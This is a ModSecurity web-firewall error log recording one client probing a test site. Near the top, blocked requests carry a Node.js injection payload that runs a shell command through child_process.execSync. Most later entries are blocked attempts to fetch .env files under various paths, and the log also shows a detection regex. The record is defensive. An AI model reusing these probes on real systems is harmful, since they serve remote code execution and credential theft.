[Wed Feb 18 18:14:20.873844 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aZXzbEVZhN-wTu6C5d5nlAAAAAA"]
[Wed Feb 18 18:14:20.938284 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aZXzbEVZhN-wTu6C5d5nlgAAAAA"]
[Wed Feb 18 18:14:20.938920 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aZXzbEVZhN-wTu6C5d5nlgAAAAA"]
[Wed Feb 18 18:14:20.939128 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aZXzbEVZhN-wTu6C5d5nlgAAAAA"]
[Wed Feb 18 18:14:21.009091 2026] [:error] [pid 2167592] [client 195.178.110.34:51898] [client 195.178.110.34] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aZXzbbwAbj7ynvBbVCIkhwAAAAs"]
[Wed Feb 18 18:14:21.009623 2026] [:error] [pid 2167592] [client 195.178.110.34:51898] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aZXzbbwAbj7ynvBbVCIkhwAAAAs"]
[Wed Feb 18 18:14:21.009796 2026] [:error] [pid 2167592] [client 195.178.110.34:51898] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aZXzbbwAbj7ynvBbVCIkhwAAAAs"]
[Wed Feb 18 18:14:21.074910 2026] [:error] [pid 2161248] [client 195.178.110.34:51906] [client 195.178.110.34] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:param. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:param: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo \\x5c\\x5c'VULN_TEST\\x5c\\x5c'\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZXzbRUQWjA1_wshvbG-aQAAAAU"]
[Wed Feb 18 18:14:21.075577 2026] [:error] [pid 2161248] [client 195.178.110.34:51906] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZXzbRUQWjA1_wshvbG-aQAAAAU"]
[Wed Feb 18 18:14:21.075736 2026] [:error] [pid 2161248] [client 195.178.110.34:51906] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZXzbRUQWjA1_wshvbG-aQAAAAU"]
[Wed Feb 18 18:14:31.025904 2026] [:error] [pid 2161248] [client 195.178.110.34:47964] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZXzdxUQWjA1_wshvbG-bAAAAAU"]
[Wed Feb 18 18:14:31.026135 2026] [:error] [pid 2161248] [client 195.178.110.34:47964] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZXzdxUQWjA1_wshvbG-bAAAAAU"]
[Wed Feb 18 18:14:31.026315 2026] [:error] [pid 2161248] [client 195.178.110.34:47964] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZXzdxUQWjA1_wshvbG-bAAAAAU"]
[Wed Feb 18 18:14:54.763898 2026] [:error] [pid 2167596] [client 195.178.110.34:52016] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZXzjgNfOk4fQtXkBoshZgAAAAk"]
[Wed Feb 18 18:14:54.764132 2026] [:error] [pid 2167596] [client 195.178.110.34:52016] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZXzjgNfOk4fQtXkBoshZgAAAAk"]
[Wed Feb 18 18:14:54.764313 2026] [:error] [pid 2167596] [client 195.178.110.34:52016] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZXzjgNfOk4fQtXkBoshZgAAAAk"]
[Wed Feb 18 18:15:00.438952 2026] [:error] [pid 2161842] [client 195.178.110.34:60944] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZXzlB7i3MGSJhlZ2JDhCAAAAAY"]
[Wed Feb 18 18:15:00.439197 2026] [:error] [pid 2161842] [client 195.178.110.34:60944] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZXzlB7i3MGSJhlZ2JDhCAAAAAY"]
[Wed Feb 18 18:15:00.439400 2026] [:error] [pid 2161842] [client 195.178.110.34:60944] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZXzlB7i3MGSJhlZ2JDhCAAAAAY"]
[Wed Feb 18 18:15:05.583648 2026] [:error] [pid 2167597] [client 195.178.110.34:60956] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZXzmbL5cjoaqbNB75y5QAAAAA4"]
[Wed Feb 18 18:15:05.583877 2026] [:error] [pid 2167597] [client 195.178.110.34:60956] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZXzmbL5cjoaqbNB75y5QAAAAA4"]
[Wed Feb 18 18:15:05.584052 2026] [:error] [pid 2167597] [client 195.178.110.34:60956] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZXzmbL5cjoaqbNB75y5QAAAAA4"]
[Wed Feb 18 18:15:08.212819 2026] [:error] [pid 2161191] [client 195.178.110.34:60968] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aZXznHPppL83WAI9ZsBOeAAAAAE"]
[Wed Feb 18 18:15:08.213087 2026] [:error] [pid 2161191] [client 195.178.110.34:60968] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aZXznHPppL83WAI9ZsBOeAAAAAE"]
[Wed Feb 18 18:15:08.213374 2026] [:error] [pid 2161191] [client 195.178.110.34:60968] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aZXznHPppL83WAI9ZsBOeAAAAAE"]
[Wed Feb 18 18:15:15.732772 2026] [:error] [pid 2167592] [client 195.178.110.34:42290] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZXzo7wAbj7ynvBbVCIkiAAAAAs"]
[Wed Feb 18 18:15:15.733014 2026] [:error] [pid 2167592] [client 195.178.110.34:42290] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZXzo7wAbj7ynvBbVCIkiAAAAAs"]
[Wed Feb 18 18:15:15.733193 2026] [:error] [pid 2167592] [client 195.178.110.34:42290] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZXzo7wAbj7ynvBbVCIkiAAAAAs"]
[Wed Feb 18 18:15:20.861476 2026] [:error] [pid 2161248] [client 195.178.110.34:39212] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZXzqBUQWjA1_wshvbG-bgAAAAU"]
[Wed Feb 18 18:15:20.861740 2026] [:error] [pid 2161248] [client 195.178.110.34:39212] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZXzqBUQWjA1_wshvbG-bgAAAAU"]
[Wed Feb 18 18:15:20.862599 2026] [:error] [pid 2161248] [client 195.178.110.34:39212] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZXzqBUQWjA1_wshvbG-bgAAAAU"]
[Wed Feb 18 18:15:25.974734 2026] [:error] [pid 2161192] [client 195.178.110.34:39226] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZXzrVAwHIXdOR_IjqGnjQAAAAI"]
[Wed Feb 18 18:15:25.974987 2026] [:error] [pid 2161192] [client 195.178.110.34:39226] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZXzrVAwHIXdOR_IjqGnjQAAAAI"]
[Wed Feb 18 18:15:25.975575 2026] [:error] [pid 2161192] [client 195.178.110.34:39226] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZXzrVAwHIXdOR_IjqGnjQAAAAI"]
[Wed Feb 18 18:15:28.861855 2026] [:error] [pid 2167596] [client 195.178.110.34:39228] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aZXzsANfOk4fQtXkBoshZwAAAAk"]
[Wed Feb 18 18:15:28.862091 2026] [:error] [pid 2167596] [client 195.178.110.34:39228] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aZXzsANfOk4fQtXkBoshZwAAAAk"]
[Wed Feb 18 18:15:28.862287 2026] [:error] [pid 2167596] [client 195.178.110.34:39228] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aZXzsANfOk4fQtXkBoshZwAAAAk"]
[Wed Feb 18 18:15:36.838833 2026] [:error] [pid 2167597] [client 195.178.110.34:41122] [client 195.178.110.34] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aZXzuLL5cjoaqbNB75y5QQAAAA4"]
